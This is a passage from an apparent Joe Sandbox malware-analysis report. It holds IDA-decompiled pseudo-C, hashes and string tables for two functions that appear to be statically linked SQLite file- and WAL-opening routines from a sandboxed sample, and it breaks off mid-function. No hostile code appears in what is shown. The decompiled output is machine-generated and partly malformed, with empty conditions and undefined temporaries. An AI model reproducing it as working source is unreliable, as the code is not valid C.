Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID: attached databases must use the same text encoding as main database$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
API String ID: 0-2224017942
Opcode ID: 397d1a4656b3d3a79638dfbca5d32d6fa68fc4c51ae0dbcd9246d9d05f5aceba
Instruction ID: 9b39405eb6bb5325595ffd46c811080603da07189867443115043c6cec255d2a
Opcode Fuzzy Hash: 397d1a4656b3d3a79638dfbca5d32d6fa68fc4c51ae0dbcd9246d9d05f5aceba
Instruction Fuzzy Hash: 3812F3706047419FCB26DF24C490B7ABBE2BF45304F18465EE89A5B382DB35E845DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00DA1B20 Relevance: 8.0, Strings: 6, Instructions: 491
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E00DA1B20(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4, signed int _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v17;
				intOrPtr _v24;
				void* _v28;
				intOrPtr _v32;
				signed int _v36;
				char* _v40;
				signed int _v44;
				signed int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t167;
				char* _t190;
				short _t191;
				intOrPtr _t192;
				signed int _t203;
				char _t205;
				signed int _t223;
				void* _t224;
				void* _t225;
				void* _t226;
				void* _t227;
				short _t235;
				char _t240;
				char _t241;
				intOrPtr _t249;
				intOrPtr _t250;
				char* _t252;
				intOrPtr _t258;
				intOrPtr _t259;
				intOrPtr _t260;
				void* _t263;
				signed int _t265;
				void* _t266;
				signed int _t267;
				signed int _t268;
				void* _t269;
				void* _t270;
				void* _t271;
				intOrPtr* _t275;
				intOrPtr* _t276;
				void* _t278;
				intOrPtr _t286;
				intOrPtr _t291;
				intOrPtr _t292;
				intOrPtr _t293;
				intOrPtr _t294;
				intOrPtr _t295;
				intOrPtr _t296;
				intOrPtr* _t301;
				signed int _t309;
				intOrPtr* _t310;
				signed int _t311;
				intOrPtr _t318;
				intOrPtr _t321;
				intOrPtr _t323;
				intOrPtr* _t324;
				intOrPtr* _t329;
				intOrPtr* _t332;
				signed int _t334;
				intOrPtr* _t335;
				void* _t337;
				void* _t342;
				void* _t343;
				void* _t345;
				intOrPtr* _t347;
				signed int _t349;
				void* _t350;
				intOrPtr* _t351;
				void* _t352;
				void* _t354;
				void* _t355;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr* _t358;
				void* _t360;
				signed int _t361;
				intOrPtr* _t364;
				intOrPtr* _t365;
				void* _t366;
				void* _t367;
				void* _t368;
				void* _t369;
				void* _t371;
				intOrPtr* _t372;
				void* _t374;
				void* _t375;
				signed int _t377;
				void* _t378;
				void* _t379;
				void* _t381;
				void* _t382;
				void* _t384;
				void* _t385;
				void* _t388;
				void* _t390;

				_t167 =  *0xed8944; // 0xccebfc3b
				_v8 = _t167 ^ _t377;
				_v52 = __edx;
				_t339 = _a12;
				_v24 = __ecx;
				_v16 = 0;
				_t364 = _a4;
				_t265 = 0;
				_v48 =  !_t339 & 0x00000001;
				_t349 = 0;
				_v28 = _t364;
				_v44 = 0x1000;
				_v40 = 0;
				_t12 = ( >  ?  *((intOrPtr*)(__ecx + 4)) : 0x48) + 7; // 0x4f
				_v12 = _t12 & 0xfffffff8;
				 *_v52 = 0;
				if((_t339 & 0x00000002) == 0) {
					_v36 = 0;
					if(_t364 == 0 ||  *_t364 == 0) {
						goto L9;
					} else {
						_t357 = _v24;
						_t371 =  *((intOrPtr*)(_t357 + 8)) + 1;
						asm("cdq");
						_t275 = L00D94E70(_t371 + _t371, _t339);
						_t388 = _t378 + 8;
						_v16 = _t275;
						if(_t275 == 0) {
							goto L68;
						} else {
							_t372 = _v28;
							 *_t275 = 0;
							_t249 =  *((intOrPtr*)( *((intOrPtr*)(_t357 + 0x24))))(_t357, _t372, _t371, _t275);
							_t358 = _t275;
							_v32 = _t249;
							_t378 = _t388 + 0x10;
							_t85 = _t358 + 1; // 0x1
							_t342 = _t85;
							asm("o16 nop [eax+eax]");
							do {
								_t323 =  *_t358;
								_t358 = _t358 + 1;
							} while (_t323 != 0);
							_t324 = _t372;
							_t349 = _t358 - _t342 & 0x3fffffff;
							_t343 = _t324 + 1;
							do {
								_t250 =  *_t324;
								_t324 = _t324 + 1;
							} while (_t250 != 0);
							_t252 = _t372 + 1 + (_t324 - _t343 & 0x3fffffff);
							_v40 = _t252;
							_t276 = _t252;
							if( *_t252 != 0) {
								do {
									_t329 = _t276;
									_t345 = _t329 + 1;
									do {
										_t258 =  *_t329;
										_t329 = _t329 + 1;
									} while (_t258 != 0);
									_t347 = (_t329 - _t345 & 0x3fffffff) + 1 + _t276;
									if(_t347 != 0) {
										_t332 = _t347;
										_t375 = _t332 + 1;
										do {
											_t259 =  *_t332;
											_t332 = _t332 + 1;
										} while (_t259 != 0);
										_t334 = _t332 - _t375 & 0x3fffffff;
									} else {
										_t334 = 0;
									}
									_t276 = _t334 + 1 + _t347;
								} while ( *_t276 != 0);
								_t252 = _v40;
							}
							_t373 = _v32;
							_t265 = _t276 - _t252 + 1;
							if(_v32 != 0) {
								L43:
								E00D95050(_v16);
								_pop(_t360);
								_pop(_t374);
								_pop(_t278);
								return E00E76672(_t373, _t278, _v8 ^ _t377, _v16, _t360, _t374);
							} else {
								_t286 = _v24;
								_t96 = _t349 + 8; // 0x9
								if(_t96 <=  *((intOrPtr*)(_t286 + 8))) {
									goto L10;
								} else {
									_push("1a584e499906b5c87ec7d43d4abce641fdf017c42125b083109bc77c4de48827");
									_push(0xcc09);
									L00D97720(_t265, _t349, _t373, 0xe, "%s at line %d of [%.10s]", "cannot open file");
									_v32 = 0xe;
									_t378 = _t378 + 0x14;
									_t373 = _v32;
									goto L43;
								}
							}
						}
					}
				} else {
					_v36 = 1;
					if(_t364 == 0 ||  *_t364 == 0) {
						L9:
						_t286 = _v24;
						L10:
						_t339 = _v12;
						_v32 = ( *((intOrPtr*)(_t286 + 4)) + 0x00000007 & 0xfffffff8) + _t265 + _v12 * 2 + 0x121 + _t349 * 2 + _t349;
						_t365 = L00D94E70(( *((intOrPtr*)(_t286 + 4)) + 0x00000007 & 0xfffffff8) + _t265 + _v12 * 2 + 0x121 + _t349 * 2 + _t349, 0);
						_t379 = _t378 + 8;
						if(_t365 == 0) {
							_t181 = _v16;
							if(_v16 != 0) {
								E00D95050(_t181);
							}
							goto L68;
						} else {
							E00E79BD0(_t349, _t365, 0, _v32);
							_t34 = _t365 + 0xe0; // 0xe0
							_t291 = _t34;
							_t340 = _v16;
							_t381 = _t379 + 0xc;
							 *((intOrPtr*)(_t365 + 0xd0)) = _t291;
							_t292 = _t291 + 0x30;
							 *((intOrPtr*)(_t365 + 0x3c)) = _t292;
							_t293 = _t292 + ( *((intOrPtr*)(_v24 + 4)) + 0x00000007 & 0xfffffff8);
							 *((intOrPtr*)(_t365 + 0x44)) = _t293;
							_t294 = _t293 + _v12;
							 *((intOrPtr*)(_t365 + 0x40)) = _t294;
							_t295 = _t294 + _v12;
							 *((intOrPtr*)(_t365 + 0xa8)) = _t295;
							if(_v16 != 0) {
								 *((intOrPtr*)(_t365 + 0xac)) = _t295 + 1 + _t265 + _t349;
								L00E79650(_t295, _t340, _t349);
								_t385 = _t381 + 0xc;
								if(_t265 != 0) {
									L00E79650( *((intOrPtr*)(_t365 + 0xa8)) + 1 + _t349, _v40, _t265);
									_t385 = _t385 + 0xc;
								}
								L00E79650( *((intOrPtr*)(_t365 + 0xac)), _v16, _t349);
								asm("movq xmm0, [0xec6c88]");
								asm("movq [ecx+edi], xmm0");
								_t235 =  *0xec6c90; // 0x0
								 *((short*)( *((intOrPtr*)(_t365 + 0xac)) + _t349 + 8)) = _t235;
								 *((intOrPtr*)(_t365 + 0xd8)) =  *((intOrPtr*)(_t365 + 0xac)) + 9 + _t349;
								L00E79650( *((intOrPtr*)(_t365 + 0xac)) + 9 + _t349, _v16, _t349);
								_t321 =  *((intOrPtr*)(_t365 + 0xd8));
								_t240 = "-wal"; // 0x6c61772d
								 *((intOrPtr*)(_t321 + _t349)) = _t240;
								_t241 =  *0xec6c98; // 0x0
								 *((char*)(_t321 + _t349 + 4)) = _t241;
								E00D95050(_v16);
								_t381 = _t385 + 0x1c;
							}
							_t190 = _v28;
							_t296 = _v24;
							_t267 = _a16;
							 *_t365 = _t296;
							 *(_t365 + 0x90) = _t267;
							if(_t190 == 0 ||  *_t190 == 0) {
								L49:
								 *((short*)(_t365 + 0x10)) = 0x401;
								_t268 = _t267 & 0x00000001;
								 *(_t365 + 0xd) = 1;
								_v17 = 1;
								goto L50;
							} else {
								_v12 = 0;
								_t309 =  *((intOrPtr*)( *((intOrPtr*)(_t296 + 0x18))))(_t296,  *((intOrPtr*)(_t365 + 0xa8)),  *((intOrPtr*)(_t365 + 0x3c)), _t267 & 0x00087f7f,  &_v12);
								_t381 = _t381 + 0x14;
								_v16 = _t309;
								_t268 = _v12 & 0x00000001;
								if(_t309 != 0) {
									L57:
									_v17 = 0;
									if(_t309 == 0) {
										L50:
										_t340 =  &_v44;
										_t191 = E00DA10F0(_t365,  &_v44, 0xffffffff);
										_t382 = _t381 + 4;
										_v16 = _t191;
										if(_t191 != 0) {
											goto L58;
										} else {
											_t301 =  *((intOrPtr*)(_t365 + 0xd0));
											 *_t301 = _t191;
											 *((intOrPtr*)(_t301 + 4)) = _t191;
											 *((intOrPtr*)(_t301 + 8)) = _t191;
											 *((intOrPtr*)(_t301 + 0xc)) = _t191;
											 *((short*)(_t301 + 0x22)) = _t191;
											 *((intOrPtr*)(_t301 + 0x2c)) = _t191;
											 *(_t301 + 0x18) = 1;
											 *(_t301 + 0x20) = _v36 ^ 0x00000001;
											 *((intOrPtr*)(_t301 + 0x1c)) = 0x58;
											_t340 = _v44;
											_t202 =  ==  ? E00DA1A30 : 0;
											 *((char*)(_t301 + 0x21)) = 2;
											 *((intOrPtr*)(_t301 + 0x24)) =  ==  ? E00DA1A30 : 0;
											 *((intOrPtr*)(_t301 + 0x28)) = _t365;
											 *((intOrPtr*)(_t301 + 0x10)) = 0x64;
											 *(_t301 + 0x14) = 1;
											_t203 = E00D9D470(_t301, _v44);
											_v16 = _t203;
											if(_t203 != 0) {
												goto L58;
											} else {
												 *((char*)(_t365 + 6)) = _v48;
												_t205 = _v17;
												 *((intOrPtr*)(_t365 + 0x9c)) = 0x3fffffff;
												 *((char*)(_t365 + 0xc)) = _t205;
												 *((char*)(_t365 + 4)) = _t205;
												 *((char*)(_t365 + 0x12)) = _t205;
												 *((char*)(_t365 + 0xf)) = _v36;
												 *(_t365 + 0xe) = _t268;
												 *((char*)(_t365 + 7)) = _t205;
												if(_t205 == 0) {
													 *((intOrPtr*)(_t365 + 8)) = 0xa020001;
												}
												 *((intOrPtr*)(_t365 + 0xa0)) = 0xffffffff;
												 *((short*)(_t365 + 0x8c)) = 0x58;
												 *((intOrPtr*)(_t365 + 0xa4)) = 0xffffffff;
												E00DA0470(_t365);
												if(_v48 != 0) {
													if(_v36 != 0) {
														 *((char*)(_t365 + 5)) = 4;
													}
												} else {
													 *((char*)(_t365 + 5)) = 2;
												}
												 *((intOrPtr*)(_t365 + 0xc4)) = E00DA8A00;
												if( *((intOrPtr*)(_t365 + 0x28)) == 0) {
													_t209 =  !=  ? E00DA2B10 : E00DA2870;
													 *((intOrPtr*)(_t365 + 0xc8)) =  !=  ? E00DA2B10 : E00DA2870;
													 *_v52 = _t365;
													_pop(_t354);
													_pop(_t368);
													_pop(_t270);
													return E00E76672(0, _t270, _v8 ^ _t377, _t340, _t354, _t368);
												} else {
													 *((intOrPtr*)(_t365 + 0xc8)) = 0xda2e00;
													 *_v52 = _t365;
													_pop(_t355);
													_pop(_t369);
													_pop(_t271);
													return E00E76672(0, _t271, _v8 ^ _t377, _t340, _t355, _t369);
												}
											}
										}
									} else {
										L58:
										_t351 =  *((intOrPtr*)(_t365 + 0x3c));
										_t192 =  *_t351;
										if(_t192 != 0) {
											 *((intOrPtr*)( *((intOrPtr*)(_t192 + 4))))(_t351);
											_t382 = _t382 + 4;
											 *_t351 = 0;
										}
										E00D9DAB0( *((intOrPtr*)(_t365 + 0xcc)), _t351);
										E00D95050(_t365);
										_pop(_t352);
										_pop(_t367);
										_pop(_t269);
										return E00E76672(_v16, _t269, _v8 ^ _t377, _t340, _t352, _t367);
									}
								} else {
									_t310 =  *((intOrPtr*)(_t365 + 0x3c));
									_t223 =  *((intOrPtr*)( *((intOrPtr*)( *_t310 + 0x30))))(_t310);
									_t384 = _t381 + 4;
									_t356 = _t223;
									if(_t268 == 0) {
										E00DA0470(_t365);
										_t318 =  *((intOrPtr*)(_t365 + 0x94));
										if(_t318 > 0x1000) {
											_t319 =  >  ? 0x2000 : _t318;
											_v44 =  >  ? 0x2000 : _t318;
										}
									}
									_t224 = E00E22D20(_v28, "nolock");
									_t381 = _t384 + 8;
									if(_t224 == 0) {
										_t311 = 0;
									} else {
										_t340 = 1;
										_t227 = E00DF1A40(_t224, 1, 0);
										_t381 = _t381 + 4;
										_t311 = 0 | _t227 != 0x00000000;
									}
									 *(_t365 + 0xd) = _t311;
									if((_t356 & 0x00002000) != 0) {
										L48:
										_t267 = 1;
										goto L49;
									} else {
										_t225 = E00E22D20(_v28, "immutable");
										_t381 = _t381 + 8;
										if(_t225 == 0) {
											L56:
											_t309 = _v16;
											goto L57;
										} else {
											_t340 = 1;
											_t226 = E00DF1A40(_t225, 1, 0);
											_t381 = _t381 + 4;
											if((0 | _t226 != 0x00000000) == 0) {
												goto L56;
											} else {
												goto L48;
											}
										}
									}
								}
							}
						}
					} else {
						_t335 = _t364;
						_t339 = _t335 + 1;
						do {
							_t260 =  *_t335;
							_t335 = _t335 + 1;
						} while (_t260 != 0);
						_t376 = _t335 - _t339 + 1;
						_t361 = L00D94E70(_t335 - _t339 + 1, 0);
						_t390 = _t378 + 8;
						_v16 = _t361;
						if(_t361 == 0) {
							L68:
							_pop(_t350);
							_pop(_t366);
							_pop(_t266);
							return E00E76672(7, _t266, _v8 ^ _t377, _t339, _t350, _t366);
						} else {
							L00E79650(_t361, _v28, _t376);
							_t378 = _t390 + 0xc;
							_t22 = _t361 + 1; // 0x1
							_t337 = _t22;
							goto L7;
							L7:
							_t263 =  *_t361;
							_t361 = _t361 + 1;
							if(_t263 != 0) {
								goto L7;
							} else {
								_v28 = 0;
								_t349 = _t361 - _t337 & 0x3fffffff;
							}
							goto L9;
						}
					}
				}
			}

0x00da1b26
0x00da1b2d
0x00da1b32
0x00da1b35
0x00da1b3c
0x00da1b42
0x00da1b4e
0x00da1b51
0x00da1b53
0x00da1b5c
0x00da1b5e
0x00da1b63
0x00da1b6a
0x00da1b70
0x00da1b76
0x00da1b7c
0x00da1b81
0x00da1dcb
0x00da1dd0
0x00000000
0x00da1dde
0x00da1dde
0x00da1de4
0x00da1de8
0x00da1df0
0x00da1df2
0x00da1df5
0x00da1dfa
0x00000000
0x00da1e00
0x00da1e02
0x00da1e05
0x00da1e0d
0x00da1e0f
0x00da1e11
0x00da1e14
0x00da1e17
0x00da1e17
0x00da1e1a
0x00da1e20
0x00da1e20
0x00da1e22
0x00da1e23
0x00da1e27
0x00da1e2b
0x00da1e31
0x00da1e34
0x00da1e34
0x00da1e36
0x00da1e37
0x00da1e46
0x00da1e48
0x00da1e4b
0x00da1e50
0x00da1e52
0x00da1e52
0x00da1e54
0x00da1e57
0x00da1e57
0x00da1e59
0x00da1e5a
0x00da1e69
0x00da1e6b
0x00da1e71
0x00da1e73
0x00da1e76
0x00da1e76
0x00da1e78
0x00da1e79
0x00da1e7f
0x00da1e6d
0x00da1e6d
0x00da1e6d
0x00da1e88
0x00da1e8a
0x00da1e8f
0x00da1e8f
0x00da1e92
0x00da1e97
0x00da1e9a
0x00da1ed3
0x00da1ed7
0x00da1ee1
0x00da1ee2
0x00da1ee3
0x00da1ef1
0x00da1e9c
0x00da1e9c
0x00da1e9f
0x00da1ea5
0x00000000
0x00da1eab
0x00da1eab
0x00da1eb0
0x00da1ec1
0x00da1ec6
0x00da1ecd
0x00da1ed0
0x00000000
0x00da1ed0
0x00da1ea5
0x00da1e9a
0x00da1dfa
0x00da1b87
0x00da1b87
0x00da1b90
0x00da1be6
0x00da1be6
0x00da1be9
0x00da1bf3
0x00da1c08
0x00da1c10
0x00da1c12
0x00da1c17
0x00da20ec
0x00da20f1
0x00da20f4
0x00da20f9
0x00000000
0x00da1c1d
0x00da1c23
0x00da1c2b
0x00da1c2b
0x00da1c31
0x00da1c34
0x00da1c37
0x00da1c3d
0x00da1c40
0x00da1c4c
0x00da1c4e
0x00da1c51
0x00da1c54
0x00da1c57
0x00da1c5a
0x00da1c62
0x00da1c72
0x00da1c78
0x00da1c7d
0x00da1c82
0x00da1c92
0x00da1c97
0x00da1c97
0x00da1ca5
0x00da1cb3
0x00da1cbb
0x00da1cc0
0x00da1cc6
0x00da1cd9
0x00da1cdf
0x00da1ce4
0x00da1ced
0x00da1cf2
0x00da1cf5
0x00da1cfb
0x00da1cff
0x00da1d04
0x00da1d04
0x00da1d07
0x00da1d0a
0x00da1d0d
0x00da1d10
0x00da1d12
0x00da1d1a
0x00da1f3c
0x00da1f3c
0x00da1f42
0x00da1f45
0x00da1f49
0x00000000
0x00da1d29
0x00da1d2c
0x00da1d4d
0x00da1d4f
0x00da1d52
0x00da1d55
0x00da1d5a
0x00da2033
0x00da2035
0x00da203a
0x00da1f4d
0x00da1f4f
0x00da1f54
0x00da1f59
0x00da1f5c
0x00da1f61
0x00000000
0x00da1f67
0x00da1f67
0x00da1f75
0x00da1f77
0x00da1f7a
0x00da1f7d
0x00da1f80
0x00da1f84
0x00da1f8b
0x00da1f92
0x00da1f99
0x00da1fa0
0x00da1fa3
0x00da1fa6
0x00da1faa
0x00da1fad
0x00da1fb0
0x00da1fb7
0x00da1fbe
0x00da1fc3
0x00da1fc8
0x00000000
0x00da1fca
0x00da1fd0
0x00da1fd3
0x00da1fd6
0x00da1fe0
0x00da1fe3
0x00da1fe6
0x00da1fe9
0x00da1fec
0x00da1fef
0x00da1ff4
0x00da1ff6
0x00da1ff6
0x00da2002
0x00da200e
0x00da2015
0x00da201f
0x00da2028
0x00da2084
0x00da2086
0x00da2086
0x00da202a
0x00da202a
0x00da202a
0x00da208e
0x00da2098
0x00da20cb
0x00da20ce
0x00da20d7
0x00da20db
0x00da20dc
0x00da20dd
0x00da20eb
0x00da209a
0x00da209f
0x00da20a8
0x00da20ac
0x00da20ad
0x00da20ae
0x00da20bc
0x00da20bc
0x00da2098
0x00da1fc8
0x00da2040
0x00da2040
0x00da2040
0x00da2043
0x00da2047
0x00da204d
0x00da204f
0x00da2052
0x00da2052
0x00da205e
0x00da2064
0x00da206f
0x00da2070
0x00da2071
0x00da207f
0x00da207f
0x00da1d60
0x00da1d60
0x00da1d69
0x00da1d6b
0x00da1d6e
0x00da1d72
0x00da1d76
0x00da1d7b
0x00da1d87
0x00da1d90
0x00da1d93
0x00da1d93
0x00da1d87
0x00da1d9e
0x00da1da3
0x00da1da8
0x00da1ef2
0x00da1dae
0x00da1db0
0x00da1db7
0x00da1dbe
0x00da1dc3
0x00da1dc3
0x00da1ef4
0x00da1efd
0x00da1f37
0x00da1f37
0x00000000
0x00da1eff
0x00da1f07
0x00da1f0c
0x00da1f11
0x00da2030
0x00da2030
0x00000000
0x00da1f17
0x00da1f19
0x00da1f20
0x00da1f27
0x00da1f31
0x00000000
0x00000000
0x00000000
0x00000000
0x00da1f31
0x00da1f11
0x00da1efd
0x00da1d5a
0x00da1d1a
0x00da1b96
0x00da1b96
0x00da1b98
0x00da1ba0
0x00da1ba0
0x00da1ba2
0x00da1ba3
0x00da1bab
0x00da1bb4
0x00da1bb6
0x00da1bb9
0x00da1bbe
0x00da20fc
0x00da2104
0x00da2105
0x00da2108
0x00da2111
0x00da1bc4
0x00da1bc9
0x00da1bce
0x00da1bd1
0x00da1bd1
0x00da1bd1
0x00da1bd4
0x00da1bd4
0x00da1bd6
0x00da1bd9
0x00000000
0x00da1bdb
0x00da1bdd
0x00da1be0
0x00da1be0
0x00000000
0x00da1bd9
0x00da1bbe
0x00da1b90

Strings

%s at line %d of [%.10s], xrefs: 00DA1EBA
nolock, xrefs: 00DA1D96
immutable, xrefs: 00DA1EFF
1a584e499906b5c87ec7d43d4abce641fdf017c42125b083109bc77c4de48827, xrefs: 00DA1EAB
cannot open file, xrefs: 00DA1EB5
-wal, xrefs: 00DA1CED

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID: %s at line %d of [%.10s]$-wal$1a584e499906b5c87ec7d43d4abce641fdf017c42125b083109bc77c4de48827$cannot open file$immutable$nolock
API String ID: 0-3103482366
Opcode ID: 145dd61b49a41bdd1a6a2beba1457650200c657ab10b18d22c82348c591712fc
Instruction ID: a78ad29a27b653fb99d7eaee81b6881e010ed2c0dda09e77581f3633d0e81661
Opcode Fuzzy Hash: 145dd61b49a41bdd1a6a2beba1457650200c657ab10b18d22c82348c591712fc
Instruction Fuzzy Hash: CD020975A007059FDB14CF68C851BAEBBF1EF46314F18816DD859AB342D736E906CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00DA2380 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 389
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E00DA2380(void* __ebx, signed int __ecx) {
				signed int _v8;
				char _v36;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed char _v56;
				void* __edi;
				void* __esi;
				signed int _t123;
				signed char _t125;
				signed char _t127;
				signed char _t129;
				signed char _t134;
				intOrPtr _t135;
				signed char _t138;
				signed int* _t140;
				signed int* _t147;
				signed char _t150;
				intOrPtr _t151;
				signed int* _t152;
				signed int* _t156;
				signed int* _t158;
				signed char _t160;
				signed int* _t163;
				signed int* _t166;
				signed char _t174;
				signed char _t177;
				signed int _t179;
				signed char _t185;
				void* _t186;
				signed int* _t195;
				signed char _t201;
				signed int _t202;
				intOrPtr* _t204;
				signed int _t207;
				signed int _t208;
				signed int* _t209;
				signed int _t220;
				signed char _t221;
				void* _t222;
				void* _t223;
				void* _t224;
				signed int _t227;
				void* _t228;
				void* _t229;
				void* _t230;
				void* _t234;
				void* _t235;
				signed int* _t237;
				void* _t239;
				signed int _t240;
				signed int _t242;

				_t187 = __ecx;
				_t186 = __ebx;
				_t242 = (_t240 & 0xfffffff0) - 0x38;
				_t123 =  *0xed8944; // 0xccebfc3b
				_v8 = _t123 ^ _t242;
				_t220 = __ecx;
				_t226 = 0;
				_v44 = __ecx;
				_v56 = 0;
				_t125 =  *(__ecx + 0xd4);
				_v52 = _t125;
				if(_t125 != 0) {
					L50:
					_v48 = 0;
					if( *((char*)(_t125 + 0x2c)) != 0) {
						if( *((char*)(_t125 + 0x2b)) == 0) {
							_t147 =  *(_t125 + 4);
							_t187 =  *_t147;
							 *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x38))))(_t147, 0, 1, 9);
							_t125 = _v52;
							_t242 = _t242 + 0x10;
						}
						 *((char*)(_t125 + 0x2c)) = 0;
						 *(_t125 + 0x68) = 0;
						 *((char*)(_t125 + 0x2f)) = 0;
					}
					_t227 =  *(_t125 + 0x28) & 0x0000ffff;
					if(_t227 >= 0) {
						if( *((char*)(_t125 + 0x2b)) == 0) {
							_t187 =  *(_t125 + 4);
							 *((intOrPtr*)( *((intOrPtr*)( *_t187 + 0x38))))(_t187, _t227 + 3, 1, 5);
							_t125 = _v52;
							_t242 = _t242 + 0x10;
						}
						 *(_t125 + 0x28) = _t187 | 0xffffffff;
					}
					_t228 = 0;
					_t221 =  *(_t220 + 0xd4);
					do {
						_t228 = _t228 + 1;
						_t216 =  &_v48;
						_t127 = E00DA5D80(_t221,  &_v48, 0, _t228);
						_t242 = _t242 + 8;
						_v56 = _t127;
					} while (_t127 == 0xffffffff);
					_t220 = _v44;
					if(_t127 != 0 || _v48 != 0) {
						E00D9F4E0(_t220, _t228);
						if( *((char*)(_t220 + 0x16)) != 0) {
							_t140 =  *(_t220 + 0x3c);
							 *((intOrPtr*)( *((intOrPtr*)( *_t140 + 0x48))))(_t140, 0, 0, 0);
							_t242 = _t242 + 0x10;
						}
					}
					_t226 = _v56;
					goto L65;
				} else {
					if( *((intOrPtr*)(__ecx + 0x10)) != _t125) {
						L65:
						if( *((char*)(_t220 + 0xc)) != 0 ||  *((char*)(_t220 + 0x10)) != 0) {
							_t129 = _v56;
							goto L81;
						} else {
							if(_t226 != 0) {
								goto L83;
							} else {
								_t134 =  *(_t220 + 0xd4);
								if(_t134 == 0 ||  *((intOrPtr*)(_t134 + 0x28)) < _t226) {
									_t135 = 0;
									goto L73;
								} else {
									_t135 =  *((intOrPtr*)(_t134 + 0x48));
									if(_t135 != 0) {
										L76:
										if(_t135 >  *((intOrPtr*)(_t220 + 0x9c))) {
											 *((intOrPtr*)(_t220 + 0x9c)) = _t135;
										}
										 *((intOrPtr*)(_t220 + 0x18)) = _t135;
										_t129 = 0;
										goto L79;
									} else {
										L73:
										_t195 =  *(_t220 + 0x3c);
										_t216 =  *_t195;
										if(_t216 == 0) {
											goto L76;
										} else {
											asm("xorps xmm0, xmm0");
											asm("movlpd [esp+0x1c], xmm0");
											_t138 =  *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18))))(_t195,  &_v44);
											_t226 = _t138;
											_t242 = _t242 + 8;
											if(_t138 != 0) {
												goto L83;
											} else {
												asm("cdq");
												asm("adc ecx, [esp+0x20]");
												asm("sbb ecx, 0x0");
												_t135 = E00E9F5C0( *((intOrPtr*)(_t220 + 0x98)) + _v44 - 1, _t216,  *((intOrPtr*)(_t220 + 0x98)), _t216);
												goto L76;
											}
										}
									}
								}
							}
						}
					} else {
						_t7 = _t226 + 1; // 0x1
						_t216 = _t7;
						_v52 = 1;
						_t150 = E00DA1280(__ecx, _t7);
						_t226 = _t150;
						if(_t150 != 0) {
							L83:
							E00D9F6A0(_t220);
							_pop(_t223);
							_pop(_t230);
							return E00E76672(_t226, _t186, _v8 ^ _t242, _t216, _t223, _t230);
						} else {
							if( *((char*)(__ecx + 0x11)) > 1) {
								L6:
								if( *((char*)(_t220 + 0xe)) == 0) {
									_t151 =  *((intOrPtr*)(_t220 + 0x11));
									_v56 = 0;
									if(_t151 < 4 || _t151 == 5) {
										if( *((intOrPtr*)(_t220 + 0xd)) == 0) {
											_t152 =  *(_t220 + 0x3c);
											_t201 =  *((intOrPtr*)( *((intOrPtr*)( *_t152 + 0x1c))))(_t152, 4);
											_t242 = _t242 + 8;
											_v56 = _t201;
											if(_t201 != 0) {
												goto L82;
											} else {
												 *((char*)(_t220 + 0x11)) = 4;
												_v56 = _t201;
												goto L15;
											}
										} else {
											 *((char*)(_t220 + 0x11)) = 4;
											_v56 = 0;
											goto L15;
										}
									} else {
										if(0 != 0) {
											goto L82;
										} else {
											L15:
											if( *( *(_t220 + 0x40)) == 0) {
												_t235 =  *_t220;
												_t174 =  *((intOrPtr*)( *((intOrPtr*)(_t235 + 0x20))))(_t235,  *((intOrPtr*)(_t220 + 0xac)), 0,  &_v48);
												_t242 = _t242 + 0x10;
												_v56 = _t174;
												if(_t174 == 0 && _v48 != _t174) {
													_v52 = _t174;
													_t177 =  *((intOrPtr*)( *((intOrPtr*)(_t235 + 0x18))))(_t235,  *((intOrPtr*)(_t220 + 0xac)),  *(_t220 + 0x40), 0x802,  &_v52);
													_t242 = _t242 + 0x14;
													_v56 = _t177;
													if(_t177 == 0 && (_v52 & 0x00000001) != 0) {
														_push("1a584e499906b5c87ec7d43d4abce641fdf017c42125b083109bc77c4de48827");
														_push(0xcde5);
														L00D97720(_t186, _t220, _t235, 0xe, "%s at line %d of [%.10s]", "cannot open file");
														_t242 = _t242 + 0x14;
														_v56 = 0xe;
														_t237 =  *(_t220 + 0x40);
														_t179 =  *_t237;
														if(_t179 != 0) {
															 *((intOrPtr*)( *((intOrPtr*)(_t179 + 4))))(_t237);
															_t242 = _t242 + 4;
															 *_t237 = 0;
														}
													}
												}
											}
											_t156 =  *(_t220 + 0x40);
											_t202 =  *_t156;
											if(_t202 == 0) {
												if( *((char*)(_t220 + 4)) != 0) {
													L33:
													_t129 = _v56;
												} else {
													_t166 =  *(_t220 + 0x3c);
